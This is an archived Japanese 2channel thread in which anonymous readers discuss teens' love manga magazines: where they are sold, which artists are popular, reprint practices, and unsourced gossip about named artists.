ifは本屋じゃなきゃ売ってない

140 :花と名無しさん:2006/12/21(木) 00:18:35 ID:???0
うちの近くのファミマは住宅地の中だからか、若い奥様向けに
Sweet、レンパラ、白書は必ずある。
他のはあまり見たことがない

141 :花と名無しさん:2006/12/21(木) 01:55:14 ID:???0
若い奥様向けってw


142 :花と名無しさん:2006/12/21(木) 10:59:03 ID:???0
近所のコンビニにアヤイフが多いのは団地が近くにあるせいか

143 :花と名無しさん:2006/12/21(木) 12:17:42 ID:???O
最近葦加のぞむ見ないけど、どこで見れるかな?アイドルと野球選手オタクな漫画家

144 :花と名無しさん:2006/12/21(木) 13:42:59 ID:???0
>143
葦珈のぞむは白書で今でも時々描いてるよ。

145 :花と名無しさん:2006/12/21(木) 19:41:19 ID:???0
学校が近いコンビニはTLや18禁置いてないよね
PTAがうるさい?笑

近くの711が囲いしてTLと18禁置いてたけど
いつのまにか撤去されていた

146 :花と名無しさん:2006/12/21(木) 22:45:19 ID:???O
>143
ポプラ社の新雑誌にエロレス漫画描いてたよ
あとラブキスに株のショート漫画描いてる

147 :花と名無しさん:2006/12/22(金) 00:39:37 ID:???O
>143
サイト持ちだから検索したら。


148 :花と名無しさん:2006/12/22(金) 19:20:42 ID:???0
なぜ言わないのか「本人、乙!」

149 :花と名無しさん:2006/12/22(金) 20:46:14 ID:???O
>148
なんで?あれだけで本人確定できる根拠は?

150 :花と名無しさん:2006/12/22(金) 22:24:44 ID:???0
根拠なくてもすぐにこういうことを言いたがる人はいるのよw

151 :花と名無しさん:2006/12/22(金) 22:46:24 ID:???0
つか、宣伝乙、本人乙ってお約束だろう…

152 :花と名無しさん:2006/12/22(金) 23:14:36 ID:???O
そんなのがお約束って
わけわからんね
今まで荒れてきた原因にもなってんのに
同じことの繰り返し
新スレ立っても相変わらずだな

153 :花と名無しさん:2006/12/22(金) 23:20:16 ID:???O
>>144>>146>>147
ありがと(^_^;)
そうだよね検索してみれば良かったんだ。
あの人の漫画読んでて「あ〜、アイドル好きなんだな〜」「野球選手好きなんだな〜」ってつくづく思うけど、結構好きなんだ。

154 :花と名無しさん:2006/12/22(金) 23:28:34 ID:???0
顔文字…って

155 :花と名無しさん:2006/12/22(金) 23:30:52 ID:???0
>>152
2ちゃんでのお約束だよ、目くじら立てる方が野暮w
普通は華麗にスルー

156 :花と名無しさん:2006/12/22(金) 23:37:25 ID:???0
ここも相変わらずだし、レンパラスレも相変わらず
一緒に埋めようか?www

157 :花と名無しさん:2006/12/22(金) 23:46:16 ID:???O
>>155
そんなのこことTL関連のスレでしか見たことない
(全部のスレチェックしてんのかってツッコミはスルー)
実際荒れる原因になってんだからもうやめれば?
学習能力付けようぜ
相変わらず作家叩き中心スレになってて見てて悲しいよ
TL読者って陰湿なの多いのかってね

158 :花と名無しさん:2006/12/23(土) 00:18:14 ID:???0
………とりあえず携帯厨はスルーでヨロ…

159 :花と名無しさん:2006/12/23(土) 00:45:01 ID:???O
ここに頻繁に登場するW厨が嵐でしょう
ここ以外でもウザがられ嫌われてることに気付け

160 :花と名無しさん:2006/12/23(土) 00:52:17 ID:???0
しつこいよ…ってスルー出来なくてスマソ…

161 :花と名無しさん:2006/12/23(土) 01:26:19 ID:???0
とりあえず157が2ちゃん慣れしてないのはよくわかった

162 :花と名無しさん:2006/12/27(水) 23:58:09 ID:???0
42 名前:花と名無しさん 投稿日:2006/12/20(水) 22:39:58 ID:???0
面白いんだけど絵が古くないかい

43 名前:花と名無しさん 投稿日:2006/12/20(水) 23:12:31 ID:???0
うん…どんなにオサレアイテムで着飾っててもおば臭スル

44 名前:花と名無しさん 投稿日:2006/12/20(水) 23:30:29 ID:???0
ちなみに42.43が思う「若い絵」って誰?

45 名前:花と名無しさん 投稿日:2006/12/20(水) 23:48:03 ID:???0
すぐこういう返しが来るんだねw
話は好きなのでもっと絵を可愛くしてくれ
ゴテゴテのレディコミ臭で損してる

46 名前:花と名無しさん 投稿日:2006/12/21(木) 00:32:33 ID:???0
こういう返しもクソも
マジで疑問だったからw

オバ絵がどうこういうヤツって多いけど
そういうヤツが、じゃあどんな絵が好きとか
こういう絵を目指した方がとかって
話は聞いたことがないからさ。
いつも一方的にけなすだけなんだよね。

47 名前:花と名無しさん 投稿日:2006/12/21(木) 00:41:47 ID:???0
個人スレで他作家と比較したって
他作家が白い目で見られるだけだろうが
そんな問いこそアフォ過ぎる
絵を可愛くしろで不満か?
そんなことないと突っかかりたいだけだろ

163 :花と名無しさん:2006/12/27(水) 23:59:05 ID:???0
48 名前:花と名無しさん 投稿日:2006/12/21(木) 00:48:53 ID:???0
じゃあ
「絵を可愛くしろ」
「十分かわいいですが何か」で終了だな。

おまえこそ貶したいだけだろw

49 名前:花と名無しさん 投稿日:2006/12/21(木) 00:51:38 ID:???0
絵が古いというのか分らないけど
泥臭い重さを感じる絵だとは思う

50 名前:花と名無しさん 投稿日:2006/12/21(木) 01:04:40 ID:???0
>48
マンセ−厨みっともない
こういう絵を目指すとか人まねしたってしょうがないよ
自分ももうちょっと今の絵をそぎ落としたらいいと思う
話が好きでよんでるけど正直絵は…
sweetでも最初スルーしてたし
そうゆう人今までもTLスレでいたから
食わず嫌いの人結構いると思うんだよね

51 名前:花と名無しさん 投稿日:2006/12/21(木) 03:46:14 ID:???0
このスレもついにTL作家達に捕まってしまったか・・・

52 名前:花と名無しさん 投稿日:2006/12/21(木) 03:57:50 ID:???0
絵が嫌いならスルーすればいいのに
わざわざ読んでけなすってどういうアンチだろうね
そこまでTLに執着する読者ってやっぱり作家だったり?

164 :花と名無しさん:2006/12/28(木) 00:09:17 ID:???0
どこからのコピペだw

165 :花と名無しさん:2006/12/28(木) 00:16:32 ID:Ewnx5vlg0
誰のこと?

166 :花と名無しさん:2006/12/28(木) 00:19:38 ID:???0
TLスレもうダメかもしれんね

167 :花と名無しさん:2006/12/28(木) 09:02:53 ID:???0
一番人気なTL作家って誰?
悠木? 天野? ふぁりな?

168 :花と名無しさん:2006/12/28(木) 10:00:09 ID:???0
167じゃないことだけは確か

169 :花と名無しさん:2006/12/28(木) 11:46:24 ID:???0
悠木はもうBLしか新作描けないようだし
ふぁりなは脱エロ

天野・・・?
このすれでアンチの多い夏生が理解できないけど人気なのかも

170 :花と名無しさん:2006/12/28(木) 12:57:51 ID:???0
夏生はこのスレにいる作家に叩かれてるだけで
アンチが多いとも思えないが。
どうせ「私の方が絵が上手いのにー!」のやっかみで、載せてもらえない
またはコミックスも出してもらえない作家が多いんだろうけど

171 :花と名無しさん:2006/12/28(木) 13:06:59 ID:???0
エスパーは止めようよー
荒れる元だお

172 :花と名無しさん:2006/12/28(木) 16:18:40 ID:???0
葉月かなえやはづき由依は?
表紙描いてる人は人気あるんじゃね?

173 :花と名無しさん:2006/12/28(木) 17:52:02 ID:???0
表紙やカラーは人気よりも年功序列や過去の実績を優先する場合もあるからなあ
コミクス個別売り上げとか明確なソースがないと誰が一番かはわからんとオモ

174 :花と名無しさん :2006/12/28(木) 23:02:43 ID:???0
>人気よりも年功序列や過去の実績を優先する場合もある
いつの時代・・
やっぱいまは人気ある人にカラーつくんでないの?

175 :花と名無しさん:2006/12/28(木) 23:15:34 ID:???O
>>174
禿同
カラーは雑誌の顔であり
花である

176 :花と名無しさん:2006/12/28(木) 23:44:03 ID:???0
コミケ前のカラーは暇な作家で、そこそこ人気があり
且つそれなりに見られるカラーが描ける人なら、まわってきやすいよ

177 :花と名無しさん:2006/12/29(金) 00:02:59 ID:???0
どの雑誌の表紙も長年同じ人だね


178 :花と名無しさん:2006/12/29(金) 00:45:57 ID:???0
同じ人をずっと使うことで似たような雑誌の中で紛れないようにしてるのかもね。
っていうか雑誌デザインがどこも似たり寄ったりですでに紛れている気がするが。
そういや数ヶ月表紙描いたけど降板?させられていた作家もいたような。
毎号表紙作家を変えるとなると各作家のスケジュール管理が必要になって、
編集者の片手間で作られてるTLでは割に合わないのかも。

179 :花と名無しさん:2006/12/29(金) 05:00:23 ID:???0
表紙は知らないけど、カラーは人気なくてもゴリ押しで勝ち取る人もいるお
電話で何時間も編集にがなりたてる白書の某さんとかwww

180 :花と名無しさん:2006/12/29(金) 08:28:49 ID:???O
>>179kwsk

181 :花と名無しさん:2006/12/29(金) 08:58:33 ID:???O
>>179
白書時代の恥子がこうだったらしいぞ

182 :花と名無しさん:2006/12/29(金) 11:05:08 ID:???0
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
◆漫画家達の愚痴はここだけに汁!60◆ [漫画]
新人少女漫画家たちの愚痴スレ ver.3 [アニメ漫画業界]

183 :花と名無しさん:2006/12/29(金) 11:46:26 ID:???0
新人少女漫画家たちの愚痴スレ ver.3 [アニメ漫画業界] の
おすすめ2ちゃんねるより。

■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
◆漫画家達の愚痴はここだけに汁!60◆ [漫画]
り ぼ ん 投稿者について語るpart.21 [難民]
きらりん☆レボリューションを終わらせるスレッド [アニメ]
【ピンキ】平和作家行方スレ【sugar】 [少女漫画]
デザートってどうよ?6 [少女漫画]
---------------------------------------------------------------------------

【ピンキ】平和作家行方スレ【sugar】 [少女漫画]
デザートってどうよ?6 [少女漫画]
wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww!


184 :花と名無しさん:2006/12/29(金) 12:24:52 ID:???O
くりすタン・・・


お友達のあぐらタンがイフに移籍していましたよ
無理して大手狙うより近場で探したらどうですか

185 :花と名無しさん:2006/12/29(金) 12:55:55 ID:???O
ゴリ押しなら恋パラ時代の葉月もやってるぞ。
結果的にそれで今の地位があるわけだし
自分売り込んでナンボの業界なんだから
別に悪いことじゃないと思うが

186 :花と名無しさん:2006/12/29(金) 13:03:04 ID:???0
ごり押ししてうざがられるなら
描き続けていてもいずれ切られるでそ
ごり押ししてなんぼ

187 :花と名無しさん:2006/12/29(金) 13:42:23 ID:???0
…読者はどうでもいいわけだ
ごり押しの作家とそれを許す編集の惰性なわけだw

本当にここって作家ばっかりなんだね

188 :花と名無しさん:2006/12/29(金) 14:12:55 ID:???0
>>181
恥子だけじゃなくて、夏生と恥子ともう一人いたらしい
その三人以外にカラーや巻頭がつくと一斉に嫌がらせと編集攻撃だったと
前の白書スレに書いてあったお?

まあ、世の中ごねたもの勝ちってのは漫画だけの世界じゃないわな
ごねて切られるのを恐れているチキンの弱小作家には
ごねる勇気もないんだから。
逆にごねる度胸があるから売れるんだし、くやしかったらごねてみればいい

189 :花と名無しさん :2006/12/29(金) 14:37:52 ID:???0
>>187
ごねてカラーもらっても結果(=読者の声)が出ないといずれ切られる。
読者はどうでもいいなんてことはないとオモ

190 :花と名無しさん:2006/12/29(金) 15:28:56 ID:???0
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
◆漫画家達の愚痴はここだけに汁!60◆ [漫画]
新人少女漫画家たちの愚痴スレ ver.3 [アニメ漫画業界]

作家ばっかりwww

191 :花と名無しさん:2006/12/29(金) 15:49:06 ID:???0
>>188
田島だな、ソレ

192 :花と名無しさん:2006/12/29(金) 16:03:26 ID:???0
田島って?

193 :花と名無しさん:2006/12/29(金) 17:41:36 ID:???0
>>166
パワーのある作家さんは、あの都条例にひっかかった
間抜けな雑誌のせいで居なくなったからね・・・

ああ・・・規制の緩かった6年前は良かった

194 :花と名無しさん:2006/12/29(金) 19:34:14 ID:???O
>>192
田島悠梨
私が覚えてるのは、
恥子、田島、川嶋が(当時)仲がよかったんだけど反面すごく嫉妬深くて
三人のうち誰かがカラー描くと、なんであの人なんだ、
自分にも描かせろと編集にごねたり
陰口叩いたりで、編集者も困りまくってた、ということ。特に恥子がすごかったんじゃなかったっけ?
(以上、かなり昔の白書スレから、記憶を頼りに書いてみました)
あの当時は確か恥子は高校生だし、イタタな自分を
今は反省してる…わけないか

195 :花と名無しさん:2006/12/29(金) 21:18:00 ID:???0
ミクシでストーカーするのやめてー
別垢取ってもバレバレですから

196 :花と名無しさん:2006/12/29(金) 22:16:34 ID:???0
>>194
憶えてるw
しかし揃いに揃ってイ多だなww

197 :花と名無しさん:2006/12/29(金) 23:52:41 ID:???0
>>195
だれ?

198 :花と名無しさん:2006/12/30(土) 16:54:15 ID:???0
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
◆漫画家達の愚痴はここだけに汁!60◆ [漫画]
遙時 イタタ神子チャソ魚血スレ〜マターリヲチしる!〜36 [ネットwatch]
新人少女漫画家たちの愚痴スレ ver.3 [アニメ漫画業界]
【28】Moi dix Mois † Moi-meme-Moitie【28】 [ヴィジュバンド]

199 :花と名無しさん:2007/01/05(金) 12:11:17 ID:???0
遙時のドジーンやってるTL作家って誰だ?w

200 :花と名無しさん:2007/01/05(金) 13:33:18 ID:???O
ネトヲチ板で祭りになってるから読んだが
すごいな



クビ釣りて

201 :花と名無しさん:2007/01/05(金) 14:13:41 ID:???0
なんの話?

202 :花と名無しさん:2007/01/05(金) 15:41:16 ID:???0
592 :名無しさん@ゴーゴーゴーゴー!:2007/01/04(木) 08:18:26 ID:wfd//49I
TLもBLも経験した自分としては
失礼だけどBLで売れている(売れてた経験ある)作家が
原稿料最下層のTLに都落ちなんて考えられん…

ただ、どのTL系雑誌も共通して担当は何描いても
えんぴつ描きで仕上げすら適当でもおkくれるから
とりあえず雑誌の穴を埋めたいだけの編集の甘い言葉しか
信じるものが無くなっただけかもしれないけど

203 :花と名無しさん:2007/01/05(金) 16:02:37 ID:???O
東城麻美の話

204 :花と名無しさん:2007/01/05(金) 16:48:20 ID:???0
エンピツ描きのTLなんて読んだことないけどな
東城もDQNだが、202のコピペ書いた作家も同レベルじゃん

205 :花と名無しさん:2007/01/05(金) 17:29:23 ID:???O
北川みゆきが回想シーンを鉛筆書きしてたのはお盆えてる
効果を狙ったつもりだろうが手抜きにしか見えなかった

206 :花と名無しさん:2007/01/05(金) 20:42:25 ID:???0
TLで鉛筆描きのだったら天野しか覚えてない
もっと昔はもっとあったのかもしれないけど
男性系はコミケ前に多いし、BLだってかなり見たことあるけどな

207 :花と名無しさん:2007/01/07(日) 22:18:19 ID:???0
キーワード【 エロ 白書 パラ 漫画 雑誌 恋愛 空木 】
------------------------------------------------------------
IEで見ると上にある、これって検索キーワード?

208 :花と名無しさん:2007/01/11(木) 16:06:51 ID:???0
半年たてば他誌の再録を載せていいの?
確か1年でなかった?
いつから半年に変更になったの?

209 :花と名無しさん:2007/01/11(木) 18:54:30 ID:???0
>>208
シランガナw

210 :花と名無しさん:2007/01/11(木) 22:49:04 ID:???O
>208
ルールなんかないだろう

211 :花と名無しさん:2007/01/11(木) 23:26:49 ID:???0
再録を載せる金目当ての作家と編集にルールもモラルもないと思う
TLって楽してんなー
他のジャンルじゃ考え付かないよ

212 :花と名無しさん:2007/01/12(金) 06:22:52 ID:???0
>>211
そんだけ、作り手に思い入れもないって言うことだよorz.

そして、「TLが好き」と公言する作家に限ってヘタレであり、
編集はそう言う人の熱意を食い物にして潰す香具師ばかり
と言う事実を思い出すんだ。

213 :花と名無しさん:2007/01/12(金) 14:23:10 ID:???0
上手くて面白くて漫画に情熱のある作家はTLになんて来ませんよ
いたとしても卒業して他ジャンルに鞍替えしてるさ

214 :花と名無しさん:2007/01/12(金) 15:09:49 ID:???0
どうしてそんなに卑下するんだ
職業に貴賤をつけてどうする

215 :花と名無しさん:2007/01/12(金) 15:15:00 ID:???O
???
みんなTL嫌いなの?

216 :花と名無しさん:2007/01/12(金) 15:21:32 ID:???0
一流大学出てる人が「大学なんて必要ないよ」と中卒を慰めるのは美談
中卒の人が「大学なんて必要ないよ」と大学卒に言うのは…

TLスレで「TLも他の漫画と同じ」って言うのは、頭悪いのを露呈してて
読者として恥ずかしいからやめて欲しい。
TLはエロ漫画、だから読んでるんだからさ

217 :花と名無しさん:2007/01/12(金) 15:33:01 ID:???0
>>212
本誌に再録をバンバン入れるのは最近では殆どない
TLで売れている白書・SWEET・恋パラではあまりやっていない
(再録中心の増刊や別冊は置いといて)
そして再録OKするのは作家の権限、作家が断ったら乗せる事はない

そういう作家と編集と、ちゃんと頑張ってる他と同じジャンルだからって
一緒にすべきじゃないお?

218 :花と名無しさん:2007/01/12(金) 15:56:12 ID:???0
羽田の再録>>>>>>>>>>>>>>>>>>>他作家の新作
だからしょうがない

219 :花と名無しさん:2007/01/12(金) 16:09:43 ID:???0
羽田とりおん、な>再録

220 :花と名無しさん:2007/01/12(金) 16:24:33 ID:???0
また再録もされない作家が売れっ子作家を叩いてるのか、飽きないねえ
その情熱を漫画に向ければいいのに…ってどうせ載せてもらえないレベルだろうね
へタレがどんなに頑張っても無駄なのになー
いっそ全部再録の方が売れたりしてw

221 :花と名無しさん:2007/01/12(金) 18:03:22 ID:???0
>>220
りおん乙

222 :花と名無しさん:2007/01/12(金) 18:48:59 ID:???O
アンソロは全部再録の本がほとんどだよ。
再録載せるのって単に予算の関係じゃないの?
楽してもうけようとかじゃなくて。
ま、例外もありましょうが。

223 :花と名無しさん:2007/01/12(金) 18:52:00 ID:???0
TLはアンソロじゃないでそ

224 :222:2007/01/12(金) 19:40:37 ID:???O
>223
TLのアンソロってことです。
TL誌に載った漫画を再編集してまとめたコミックス。
わかりにくくてすまんでした。

225 :花と名無しさん:2007/01/12(金) 19:45:25 ID:???0
徳間はアンソロだったのか

226 :花と名無しさん:2007/01/12(金) 20:02:14 ID:???0
再録料と新人の原稿料って同じくらいか再録料の方が安いでしょ
だったら安くてネームバリューのある作家の名前を
表紙に並べた方が購買意欲をそそるだろうしね。

227 :花と名無しさん:2007/01/12(金) 20:09:17 ID:???O
TLっていう名目で売られてる案ソロって男性系再録のやつでそ?
それに案ソロは書き下ろしばっかのも多いんで、案ソロ=再録ってのも
かなり馬鹿すぎ、質の悪い案ソロが再録で読者を馬鹿にしてるだけ

228 :花と名無しさん:2007/01/12(金) 21:53:34 ID:???0
その漫画をはじめて見るのなら、別に再録云々は関係ないんだけど
その漫画が再録だって知って時は「手え抜きやがって」ってガッカリするな
好きな作家だったら尚更、それだけだ。

229 :花と名無しさん:2007/01/12(金) 22:04:29 ID:???0
ってかさー
TLってレディコミなんだけど…普通の少女漫画と勘違いしてない?

レディコミじゃ再録当たり前だよー

230 :花と名無しさん:2007/01/12(金) 22:21:37 ID:???O
>229
再録当たり前だとしても
呼んだことある作品だったらがっかり
新作目的で買ったのに再録だったら損した気分
再録なら予告や表紙に大きく名前出すな
…て気持ちには変わりない

231 :花と名無しさん:2007/01/12(金) 22:24:25 ID:???0
自分は中を確かめて買うんだけど、中が再録だって文句言ってる人は
確かめないの?

232 :花と名無しさん:2007/01/12(金) 22:26:33 ID:???0
6月に載せたものをその年の12月に再録だしな
せめて1年ぐらいたってから再録しろと

233 :花と名無しさん:2007/01/12(金) 22:26:36 ID:???0
再録がイヤだって人は、コミクスもぶっちゃけオール再録だぜーw

そういう人は多分「書下ろしがない、書き直しがない」って
文句言うんだろうけどね、馬鹿みたい

234 :花と名無しさん:2007/01/12(金) 22:29:49 ID:???0
>>233
おまえが馬鹿

235 :花と名無しさん:2007/01/12(金) 22:39:53 ID:???0
>>232
そういうのは編集部の意向みたいなのもあるよ
たとえばTは再録するにしても一年以上前の作品じゃないと
再録しない、というのが自分のところであるらしい
そして使い倒して後でコミクスにするので
コミクスがもっともっと後になるというドン亀ルール…

236 :花と名無しさん:2007/01/12(金) 22:48:32 ID:???O
>231
近所に書店はたくさんあるけど
どこもビニールかかって中身確かめられない…
コンビニですらガッチリ紐が架かってる

237 :花と名無しさん:2007/01/14(日) 03:23:06 ID:???O
そんな街捨ててしまえ

238 :花と名無しさん:2007/01/22(月) 02:31:50 ID:???0
今月のSweetは全体的に真っ白だった・・・

239 :花と名無しさん:2007/01/23(火) 19:29:33 ID:???0
吉井凛 トレースパクリ クッキー集英社より
http://p.pita.st/?m=hmbvestv
↓左、ロゴにあわせたほうに注目
http://p.pita.st/?1zaxc8e6
606 :花と名無しさん :2007/01/23(火) 18:04:22 ID:???0
>>594
一枚目の奴、ロゴが!!! ロゴがそのまんまや〜〜〜!!!
こりゃ言い訳できんね。

240 :花と名無しさん:2007/01/24(水) 00:01:41 ID:???O
>>238
みんな冬コミ原稿が
忙しかったんだよ

52 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)